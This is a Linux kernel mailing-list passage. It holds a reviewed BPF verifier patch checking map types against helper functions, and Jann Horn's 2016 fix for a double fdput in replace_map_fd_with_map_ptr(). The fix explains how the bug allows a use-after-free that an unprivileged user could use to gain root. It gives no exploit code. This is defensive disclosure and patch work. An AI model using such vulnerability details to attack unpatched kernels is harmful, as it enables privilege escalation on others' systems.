> Signed-off-by: Alexei Starovoitov <a...@kernel.org>
> Signed-off-by: Daniel Borkmann <dan...@iogearbox.net>
> ---
>  kernel/bpf/verifier.c | 65 
> +++
>  1 file changed, 40 insertions(+), 25 deletions(-)
>
> diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
> index 89bcaa0966da..c5c17a62f509 100644
> --- a/kernel/bpf/verifier.c
> +++ b/kernel/bpf/verifier.c
[...]
> +   case BPF_MAP_TYPE_PROG_ARRAY:
> +   if (func_id != BPF_FUNC_tail_call)
> +   goto error;
> +   break;
> +   case BPF_MAP_TYPE_PERF_EVENT_ARRAY:
> +   if (func_id != BPF_FUNC_perf_event_read &&
> +   func_id != BPF_FUNC_perf_event_output)
> +   goto error;
> +   break;
> +   case BPF_MAP_TYPE_STACK_TRACE:
> +   if (func_id != BPF_FUNC_get_stackid)
> +   goto error;
> +   break;
> +   default:
> +   break;
> +   }
> +
> +   /* ... and second from the function itself. */
> +   switch (func_id) {
> +   case BPF_FUNC_tail_call:
> +   if (map->map_type != BPF_MAP_TYPE_PROG_ARRAY)
> +   goto error;
> +   break;
> +   case BPF_FUNC_perf_event_read:
> +   case BPF_FUNC_perf_event_output:
> +   if (map->map_type != BPF_MAP_TYPE_PERF_EVENT_ARRAY)
> +   goto error;
> +   break;
> +   case BPF_FUNC_get_stackid:
> +   if (map->map_type != BPF_MAP_TYPE_STACK_TRACE)
> +   goto error;
> +   break;
> +   default:
> +   break;
> }

Looks good to me.


[PATCH] bpf: fix double-fdput in replace_map_fd_with_map_ptr()

2016-04-26 Thread Jann Horn
When bpf(BPF_PROG_LOAD, ...) was invoked with a BPF program whose bytecode
references a non-map file descriptor as a map file descriptor, the error
handling code called fdput() twice instead of once (in __bpf_map_get() and
in replace_map_fd_with_map_ptr()). If the file descriptor table of the
current task is shared, this causes f_count to be decremented too much,
allowing the struct file to be freed while it is still in use
(use-after-free). This can be exploited to gain root privileges by an
unprivileged user.
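
For illustration, the ownership rule that the fix restores looks roughly
like this (simplified sketch; the actual change is the one-line removal in
the hunk below):

	f = fdget(insn->imm);		/* take the fd reference             */
	map = __bpf_map_get(f);		/* on error, this already fdput()s f */
	if (IS_ERR(map))
		return PTR_ERR(map);	/* so the caller must not fdput(f)   */
	/* ... */
	fdput(f);			/* success path: exactly one put     */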

This bug was introduced in
commit 0246e64d9a5f ("bpf: handle pseudo BPF_LD_IMM64 insn"), but is only
exploitable since
commit 1be7f75d1668 ("bpf: enable non-root eBPF programs") because
previously, CAP_SYS_ADMIN was required to reach the vulnerable code.

(posted publicly according to request by maintainer)

Signed-off-by: Jann Horn <ja...@google.com>
Signed-off-by: Linus Torvalds <torva...@linux-foundation.org>
---
 kernel/bpf/verifier.c | 1 -
 1 file changed, 1 deletion(-)

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 2e08f8e..8291251 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -2029,7 +2029,6 @@ static int replace_map_fd_with_map_ptr(struct verifier_env *env)
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid 
bpf_map\n",
insn->imm);
-   fdput(f);
return PTR_ERR(map);
}
 
-- 
2.8.0.rc3.226.g39d4020